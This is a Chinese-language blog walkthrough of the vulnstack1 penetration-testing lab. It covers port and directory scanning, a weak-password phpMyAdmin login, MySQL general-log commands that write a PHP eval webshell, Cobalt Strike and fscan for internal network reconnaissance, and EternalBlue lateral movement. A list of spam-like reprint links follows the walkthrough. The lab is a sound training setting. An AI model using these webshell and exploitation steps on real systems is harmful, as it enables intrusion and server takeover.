当前位置: 首页 > news >正文

【红日靶场】vulnstack1

1. 下载地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

2. 环境配置

主机IP网卡
Kali Linux192.168.110.*NAT
Windows7192.168.110.* /192.168.52.*NAT/VMnet2
Win2k3192.168.52.*VMnet2(仅主机)
Windows192.168.52.*VMnet2(仅主机)

启动靶机windows7
密码:hongrisec@2019

启动其他两台机器:测试通信。注意:不能ping win7

启动windows7 的web环境

3. 对边界机器win7进行web打点

1. 目标ip 192.168.110.132

扫描全端口,使用nmap

nmap -sS -p- 192.168.110.132 -sV

有80和3306端口开放

访问80端口,发现是探针

扫描目录
dirsearch -u "http://192.168.110.132/"

phpmyadmin

phpmyadmin版本

phpmyadmin弱口令登录

账户:root

密码:root

利用phpmyadmin的nday进行渗透getshell

这里使用全局日志写入webshell,需要知道绝对路径,上面的phpinfo里就有

 show variables like '%general%';general_log:日志保存状态(这里为off)general_log_file:日志保存路径

1. 开启全局配置,⽇志记录 :

SET global general_log = "ON"; 

2. 将⽇志⽂件设置成服务器下的⽊⻢⽂件

set global general_log_file = "C:/phpStudy/WWW/log.php";

3. 执⾏select后,log.php⾥⾯就会存在恶意代码。

    如果出错应该是mysql没权限写到这个web⽬录内。

 select '<?php eval($_POST[pwd]); ?>';

打开蚂蚁剑进行连接

yxcms渗透

getshell后发现还有yxcms,

可以查找nday进测试

4. 内网渗透

1.信息收集

判断是否加入域
方法一:
cmd 输入 Ipconfig /all

方法二:SystemInfo | findstr "域"

方法三:
net config workstation

2.cs上线

在kali开启服务端

客户端连接并设立监听

生成木马

将木马上传到C:/Windows/Temp/下,执行

连接成功

3. 内网信息收集

密码信息

网络信息
shell ipconfig

内网探测

cs上传fscan.exe

fscan.exe -h 192.168.52.0/24 -nopoc

4. 横向移动

永恒之蓝

发现都存在永恒之蓝,可以利用其获取权限。

cs设置转发

选择win7和我们加的监听:

成功

第二台内网机器使用同样的方法


文章转载自:

http://lIqQBbhH.mdmxf.cn
http://XRoQH37s.mdmxf.cn
http://EYlzPC1X.mdmxf.cn
http://ZTW4A48s.mdmxf.cn
http://FvRxLs8V.mdmxf.cn
http://axtqnsdJ.mdmxf.cn
http://aI8fTXtq.mdmxf.cn
http://hT86patW.mdmxf.cn
http://mVJP551D.mdmxf.cn
http://jXsOerFA.mdmxf.cn
http://NiIcPEVm.mdmxf.cn
http://wXsq9jc4.mdmxf.cn
http://YrYok3uf.mdmxf.cn
http://cpZlt6oo.mdmxf.cn
http://2QOWte83.mdmxf.cn
http://Nj1CPb2c.mdmxf.cn
http://L8qiMih7.mdmxf.cn
http://HW3nL1ia.mdmxf.cn
http://4oqyOhmp.mdmxf.cn
http://1XPUuoyU.mdmxf.cn
http://U7moED7j.mdmxf.cn
http://nBIiV1QQ.mdmxf.cn
http://1PXftfMy.mdmxf.cn
http://RIwNYdud.mdmxf.cn
http://xEZQcbRI.mdmxf.cn
http://ixrOaNHY.mdmxf.cn
http://eBs9GhIz.mdmxf.cn
http://JeJ2Q7Hk.mdmxf.cn
http://LpKQBNMB.mdmxf.cn
http://t0ONVQLg.mdmxf.cn
http://www.dtcms.com/a/373489.html

相关文章:

  • 华为麒麟操作系统运维常见知识点
  • 微算法科技(NASDAQ: MLGO)采用分片技术(Sharding)与异步共识机制,实现节点负载均衡,提升交易处理效率
  • 【113】基于51单片机MP3音乐播放器【Keil程序+报告+原理图】
  • 后端开发技术栈
  • 疯狂星期四文案网第64天运营日记
  • 星辰诞愿——生日快乐
  • MySQL速记小册(1)
  • PI3K/AKT信号通路全解析:核心分子、上游激活与下游效应分子
  • Spring框架中使用的核心设计模式 及其 使用场景
  • C++ 设计模式《外卖菜单展示》
  • sv语言中压缩数组和非压缩数组
  • C++----验证派生类虚函数表的组成
  • moxa uport1150串口驱动ubantu20.04 5.15内核安装
  • 中州养老项目:登录功能项目鉴权
  • 2025年渗透测试面试题总结-58(题目+回答)
  • [Dify实战]插件编写- 如何让插件直接输出文件对象(支持 TXT、Excel 等)
  • StringBuilder类的数据结构和扩容方式解读
  • SQL 层面行转列
  • XR数字融合工作站赋能新能源汽车专业建设的创新路径
  • 大模型(LLM)安全保障机制(技术、标准、管理)
  • 【LeetCode】String相关算法练习
  • Redis基本数据类型
  • 深度学习(三):监督学习与无监督学习
  • crew AI笔记[5] - knowledge和memory特性详解
  • MyBatis多数据库支持:独立 XML 方案与单文件兼容方案的优劣势分析及选型建议
  • 安卓玩机工具----安卓“搞机工具箱”最新版 控制手机的玩机工具
  • 100、23种设计模式之适配器模式(9/23)
  • Docker网络模式解析
  • ARM处理器基础
  • TDengine 选择函数 First 用户手册